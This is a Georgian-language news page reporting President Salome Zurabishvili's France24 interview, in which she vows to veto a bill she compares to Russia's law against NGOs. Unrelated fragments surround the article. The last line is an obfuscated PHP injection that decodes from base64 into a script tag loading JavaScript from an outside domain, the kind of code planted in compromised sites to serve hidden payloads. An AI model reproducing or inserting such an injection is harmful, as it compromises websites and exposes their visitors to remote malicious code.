celsiusi
ავერსი შნაიდერი

 უპირველეს ყოვლისა, ნათელია ის, რომ მოსახლეობის 80% მხარს უჭერს ევროპულ მომავალს, ევროპულ ინტეგრაციას, ევროატლანტიკურ ინტეგრაციას და ასე იყო ბოლო 30 წლის განმავლობაში. ასე რომ, ვინც ქართველი ხალხის ამ ნების წინააღმდეგ წავა, წარმოადგენს არა ქართულ ნებას, ქართულ დამოუკიდებლობას, არამედ რაღაც სხვას , - ამის შესახებ საქართველოს პრეზიდენტმა სალომე ზურაბიშვილმა France24-თან ინტერვიუში განაცხადა.

პრეზიდენტის თქმით, კანონპროექტს ვეტოს დაადებს.

„და როდესაც კანონი, რომელსაც გამოიყენებენ, არის ასლი იმისა თუ რა დააწესა წარმატებით პუტინმა რუსეთში, იმ შედეგებით, რომლებიც ვნახეთ - აღარ არსებობენ არასამთავრობო ორგანიზაციები, აღარ არსებობს ოპოზიცია და ყველაფერი კონტროლირდება, ეს არ არის მომავალი, რომლის მიღებაც საქართველოს მოსახლეობას შეუძლია. ეს არ არის მომავალი, რომელსაც მე მივიღებ.

კანონს ვეტოს დავადებ. ვიცი, რომ ვეტოს დაძლევენ, მაგრამ აქ ვსაუბრობ, საქართველოს მოსახლეობის ნებას გამოვხატავ, რომელიც ქუჩებში ჩანს და თუ დააკვირდებით, თუ ვინ წარმოადგენს მოსახლეობას, ესენი ძირითადად ახალგაზრდა თაობაა, რომელიც დღეს თბილისის ქუჩებშია, რათა უთხრას “არა” რუსეთს, უთხრას “არა” რუსულ კანონს”, - განაცხადა ზურაბიშვილმა.

150
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");